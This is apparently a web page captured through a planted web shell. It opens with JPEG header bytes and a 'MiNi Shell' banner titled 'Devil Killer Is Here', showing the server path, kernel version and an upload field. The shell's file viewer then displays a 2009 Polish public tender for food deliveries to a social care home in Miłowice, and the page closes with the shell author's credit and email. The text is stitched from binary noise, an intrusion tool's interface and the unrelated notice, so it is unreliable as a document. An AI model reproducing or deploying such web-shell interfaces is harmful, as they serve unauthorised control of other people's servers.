JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090130/12168-N-2009.html

<p class="kh_header"><b>Żary: Dostawa artykułów żywnościowych do Domu Pomocy Społecznej w Miłowicach z podziałem na zadania</b><br>
<b>Numer ogłoszenia: 12168 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Miłowicach , Miłowice 26, 68-200 Żary, woj. lubuskie, tel. 0-68 374-38-22, faks 0-68 374-38-22.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomos Społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Domu Pomocy Społecznej w Miłowicach z podziałem na zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie1. Dostawa mięsa, wyrobów mięsnych, wędlin i drobiu 

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
 w skali roku
1.	Antrykot z/k	151	Kg	292
2.	Boczek surowy	151	Kg	137
3.	Karkówka z kością	151	Kg	357
4.	Karkówka bez kości	151	Kg	72
5	Łopatka bez kości	151	Kg	560
6.	Mięso gulaszowe	151	Kg	123
7.	Mięso mielone	151	Kg	66
8.	Mielonka klopsowa 400 gram	151	Kg	14
9.	Schab	151	Kg	11
10.	Wątróbka wieprzowa	151	Kg	8
11.	Filet z piersi kurczaka	151	Kg	321
12.	Kurczaki	151	Kg	1205
13.	Porcje rosołowe	151	Kg	15
14.	Udka z kurczaka	151	Kg	317
15.	Wątróbka drobiowa	151	Kg	230
16.	Żołądki drobiowe	151	Kg	60
17.	Kaszanka	151	Kg	88
18.	Pasztetowa drobiowa	151	Kg	88
19.	Salceson włoski	151	Kg	116
20.	Boczek faszerowany	151	Kg	102
21.	Baleron	151	Kg	22
22.	Kiełbasa śląska	151	Kg	357
23.	Kiełbasa zwyczajna	151	Kg	150
24.	Kiełbasa biała surowa	151	Kg	56
25.	Kiełbasa Senacka	151	Kg	7
26.	Kiełbasa jałowcowa	151	Kg	1,50
27.	Kiełbasa biała parzona	151	Kg	102
28.	Metka łososiowa	151	Kg	81
29.	Mielonka kanapkowa	151	Kg	104
30.	Mortadela drobiowa	151	Kg	166
31.	Ogonówka	151	Kg	86
32.	Polędwica drobiowa	151	Kg	199
33.	Parówki drobiowe	151	Kg	326
34.	Pieczeń drobiowa	151	Kg	14
35.
36.
37.
38.	Rolada drobiowa
Szynka gotowana
Schab
Szynka wiejska	151
151
151
151	Kg
kg
kg
kg	15
55,30
21
10


Zadanie 2. Dostawa warzyw i owoców świeżych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
 w skali roku
1.	Arbuzy	153	Kg	251
2.	Banany	153	Kg	76
3.	Brzoskwinie	153	Kg	113
4.	Cukinia	153	Kg	18
5.	Cytryna	153	Kg	106
6.	Jabłka	153	Kg	2622
7.	Mandarynki	153	Kg	50
8	Buraki	153	Kg	431
9	Botwinka	153	Kg	35
10	Czosnek 	153	Kg	9
11	Cebula	153	Kg	397
12	Fasola biała	153	Kg	105
13	Fasola szparagowa	153	Kg	70
14	Groch łuskany	153	Kg	47
15	Kapusta czerwona	153	Kg	217
16	Kapusta biała	153	Szt.	616
17	Kapusta kiszona	153	Kg	505
18	Kapusta pekińska	153	Kg	74
19	Kapusta młoda	153	Szt	25
20	Kalafior młody	153	szt	10
21	Marchew	153	Kg	1650
22	Natka pietruszki	153	pęczek	60
23
24
25
26
27
28
29
30
31
32
33	Ogórki kiszone
Pietruszka
Pietruszka z nacią
Por
Pieczarki
Rzodkiewka
Rabarbar
Seler
Szczypiorek
Sałata zielona
Ziemniaki	153
153
153
153
153
153
153
153
153
153
153	Kg
Kg
Pęczek
Szt
Kg
Pęczek
Kg
Kg
Pęczek
szt
Kg	36
434
22
610
5
290
40
590
437
157
7826

Zadanie 3. Dostawa warzyw i owoców mrożonych

1.	Brokuły mrożone	153	Kg	270
2.	Brukselka mrożona	153	Kg	105
3.	Fasolka szparag. mrożona	153	Kg	20
4.	Kalafior mrożony	153	Kg	219
5.	Mieszanka kompotowa	153	Kg	292
6.	Marchewka z groszkiem	153	Kg	228
				

Zadanie 4. Dostawa dżemów, marmolady, warzyw i owoców przetworzonych

1.	Ćwikła z chrzanem	153	szt	59
2.	Dżemy owocowe 7 kg	153	kg	15
3.	Dżemy owocowe 12 kg	153	Kg	24
4.	Dżemy owocowe 525 g	153	Szt.	214
5.	Fasolka szparag. Konserwowa 500 g	153	szt	347
6.	Groszek konserwowy 400 g	153	szt	395
7.	Jabłka prażone	153	Szt.	62
8.	Koncentrat pomidorowy o,9 l	153	szt	81
9.	Kukurydza kons. 2,5 kg	153	Szt.	7
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.	Kukurydza konserwowa 400 g
Marmolada
Miód
Miód wielokwiatowy 1,4 l
Ogórki konserwowe 0,9 l
Ogórki konserwowe 1.700 ml
Przecier ogórkowy 350 g
Papryka konserwowa 1,7 
Papryka konserwowa 500 g
Sałatka szwedzka 0,9 l
Sałatka wielowarzywna 0,9 l	153
153
153
153
153
153
153
153
153
153
153	Szt.
Kg
L
szt
szt
szt
szt
op
szt
szt
szt	62
84
19
28
550
105
211
3
154
242
397




Zadanie 5. Dostawa mleka i artykułów nabiałowych pochodzenia roślinnego

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
 w skali roku
1.	Jogurty naturalne 400 g	155	Szt	358
2.	Jogurty owocowe 150 g	155	Szt	4936
3.	Margaryna zwykła	155	kg	721
4.	Masło extra 200g	155	Kg	858
5.	Mleko w folii 2%	155	Litr	8700
6.	Margaryna do smarowania	155	Kg	92
7.	Mleko w proszku 500 g	155	Kg	12
8.	Olej	155	Kg	487
9.	Ser topiony	155	Kg	116
10.	Śmietana 18 %	155	L	886
11.	Śmietana 12 %	155	L	12
12.	Serek homogenizowany 200g	155	Szt	85
13.	Ser żółty	155	Kg	310
14.	Serek kanapkowy wiejski	154	szt	960
15.	Serek wiejski 200 g	154	Szt	950
16.
17.
18.	Serek waniliowy
Twaróg półtłusty
Twaróg	154
154
154	Szt
Kg
Kg	76
422
60



Zadanie 6. Dostawa pieczywa

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
 w skali roku
1.	Chleb zwykły krojony Baltonowski	158	Szt	4666
2.	Chleb pszenny krojony	158	Szt	904
3.	Chleb wieloziarnisty krojony	158	Szt	677
4.	Bułki zwykłe duże	158	Szt	3651
5.	Bułka tarta	158	Kg	134
6.

7.	Ciasta różne sernik, orzechowiec, biszkopt
Pączki	158

158	Kg

Szt	190

80


Zadanie 7. Dostawa artykułów mącznych, przypraw i dodatków suchych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
 w skali roku
1.	Koperek suszony	156	szt	30
2.	Maga w płynie	156	L	45
3.	Majeranek 150 g	156	szt	40
4.	Przyprawa gyros 500 g	156	szt	67
5.	Przyprawa do ryb 800 g	156	op.	2
6.	Papryka mielona czerwona	156	op.	14
7.	Pieprz mielony 500 g	156	szt	20
8.	Warzywko	156	kg	142
9.	Ziele angielskie 600 g	156	op.	1
10.	Barszcz biały	158	kg	11
11.	Barszcz czerwony 1100 g	158	op.	1
12.	Batony czekoladowe	158	Szt	30
13.	Cukierki mieszanka 2,5	158	kg	2
14.	Cukierki owocowe	158	Szt	21
15. 	Cukier waniliowy	158	Szt	65
16.	Cukier puder	158	Kg	7
17.	Czosnek granulowany	158	op	1
18.	Cukier kryształ	158	Kg	600
19.	Ciastka kruche	158	kg	15
20.	Galaretki owocowe	158	Szt	13
21.	Herbata 100 g	158	Szt	1450
22.	Kawa Inka 150 g	158	szt	292
23.	Kakao 100 g	158	szt	250
24.	Kisiele owocowe	158	szt	910
25.	Kompoty	158	Szt	80
26.	Ketchup	158	Op.	125
27.	Konserwy mięsne 300 g	158	szt	526
28.	Kasza manna	158	Kg	154
29.	Kawa rozpuszczalna 200 g	158	Szt	4
30.	Kasza gryczana 500 g	158	Kg	22
31.
32.
33.
34.
35.
36.
37.
38.
39.
4o.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.	Kasza jęczmienna
Koncentrat barszczu 330 g
Lody owocowe
Makaron 400 g 
Mąka ziemniaczana
Mąka tortowa
Majonez 700 ml
Mąka zwykła
Musztarda 800 g
Makaron nitki
Musztarda
Napoje owocowe
Ocet
Otręby pszenne
Płatki owsiane
Proszek do pieczenia
Płatki kukurydziane
Pasztety drobiowe
Paczki świąteczne
Rodzynki 500 g
Ryż biały
Sól spożywcza
Szczaw konserwowy 320 g
Wafelki w czekoladzie
Żurek
Zupa pieczarkowa	158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
158
15	Kg
szt
szt
szt
kg
kg
szt
Kg
szt
kg
szt
szt
l
szt
kg
szt
op.
szt
szt
kg
kg
kg
szt
szt
kg
kg	20
8
58
7
50
500
230
350
16
27
215
226
13
40
85
9
20
1030
80
0,30
270
250
93
70
9
6

Zadanie 8. Dostawa ryb i przetworów rybnych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
 w skali roku
1.	Ryba mrożona 	152	Kg	510
2.	Ryba wędzona	152	Kg	24
3.	Tuńczyk w sosie własnym 1.700g	152	Op.	107
4.	Paprykarz szczeciński 300g	152	Szt	98
5.	Szproty w pomidorach lub w oleju 300g	152	Szt	592
6.	Filety śledziowe Matjas	152	Kg	25



Zadanie 9. Dostawa jaj
Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
 w skali roku
1.	Jajka	124	Szt.	19.985.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 06.02.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> spełnia-nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a/formularz oferty z wypełnionym załącznikiem do oferty, b/ podpisany wzór umowy c/ podpisane oświadczenie oferenta o spełnieniu warunków udziału w postępowaniu  d/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( w przypadku wspólnego ubiegania się o udzielenia zamówienia dotyczy wszystkich wykonawców ).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dps.powiatzarski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Miłowicach, Miłowice 26   68-200 Żary.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2009 godzina 10:00, miejsce: Dom Pomocy Społecznej w Miłowicach, Miłowice 26 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com